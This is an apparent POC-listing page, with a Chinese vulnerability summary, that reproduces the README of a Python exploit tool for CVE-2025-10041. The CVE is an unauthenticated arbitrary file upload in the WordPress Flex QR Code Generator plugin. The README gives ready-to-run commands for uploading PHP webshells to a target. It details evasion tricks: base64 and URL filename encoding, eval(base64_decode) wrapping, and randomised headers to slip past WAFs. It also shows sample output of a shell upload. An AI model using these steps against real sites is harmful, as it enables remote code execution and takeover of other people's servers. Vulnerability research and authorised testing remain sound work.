POC详情: c9fb5487c26b60f466a60d2cb4d9fe682675fd50

来源
关联漏洞
标题: WordPress plugin Flex QR Code Generator 代码问题漏洞 (CVE-2025-10041)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin Flex QR Code Generator 1.2.5及之前版本存在代码问题漏洞,该漏洞源于save_qr_code_to_db函数缺少文件类型验证,可能导致未经验证的攻击者上传任意文件并执行远程代码。
描述
Flex QR Code Generator <= 1.2.5 - Unauthenticated Arbitrary File Upload
介绍
# CVE-2025-10041
Flex QR Code Generator &lt;= 1.2.5 - Unauthenticated Arbitrary File Upload
# 🚨 Flex QR Code Generator ≤ 1.2.5 - Unauthenticated Arbitrary File Upload

---

## 📝 Description

The **Flex QR Code Generator** plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `save_qr_code_to_db()` function in all versions up to, and including, `1.2.5`.  
This allows **unauthenticated attackers** to upload malicious files to the affected site's server, potentially leading to remote code execution.

- **CVE:** `CVE-2025-10041`
- **CVSS:** `9.8 (Critical)`

---

## 💡 About This Script

`CVE-2025-10041.py` is a professional exploit tool designed to automate the attack by leveraging this vulnerability.  
It provides advanced features for bypassing common protections and encoding techniques.

---

## ⚙️ Features

- **Automatic vulnerability detection** (version check)
- **Arbitrary file upload** (including PHP webshells)
- **Filename encoding bypass**: Base64 or URL encoding
- **Content encoding bypass**: PHP base64 wrapper for shell code
- **Randomized HTTP headers** to evade basic WAFs
- **Custom header support**
- **Full command-line interface** with argument parsing and help message

---

## 🖥️ Usage

### 1. **Basic Exploit**

```bash
python3 CVE-2025-10041.py -u http://target.com
```

### 2. **Shell Filename Encoding**

```bash
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
```

### 3. **Shell Content Encoding**

```bash
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
```

### 4. **Custom Shell Filename**

```bash
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
```

### 5. **Advanced (Combine Options)**

```bash
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
```

### 6. **Custom Headers**

```bash
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
```

---

## 🆘 Help

To see all available options and usage instructions:

```bash
python3 CVE-2025-10041.py --help
```

---

## 🔓 Bypass Techniques

- **Filename encoding**: Some servers block `.php` or suspicious names; encoding may evade filters.
- **Content encoding**: Wrapping shell code in `eval(base64_decode(...))` may bypass content filters.
- **Random headers**: Rotating user-agent, referer, and cookies to avoid detection.
- **Custom headers**: Add your own headers for advanced evasion.

---

## 📋 Example Output

```
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
```

---

## ⚠️ Disclaimer

This script is provided **for educational, research, and authorized penetration testing purposes only**.  
**Unauthorized use** against systems you do not own or have explicit permission to test is strictly prohibited and illegal.  
The author is **not responsible** for any misuse or damage caused by this tool.

---

## ✍️ By:  
*Nxploited (Khaled Alenazi)*

---
文件快照

[4.0K] /data/pocs/c9fb5487c26b60f466a60d2cb4d9fe682675fd50 ├── [6.5K] CVE-2025-10041.py ├── [1.5K] LICENSE ├── [3.2K] README.md └── [ 17] requirements.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。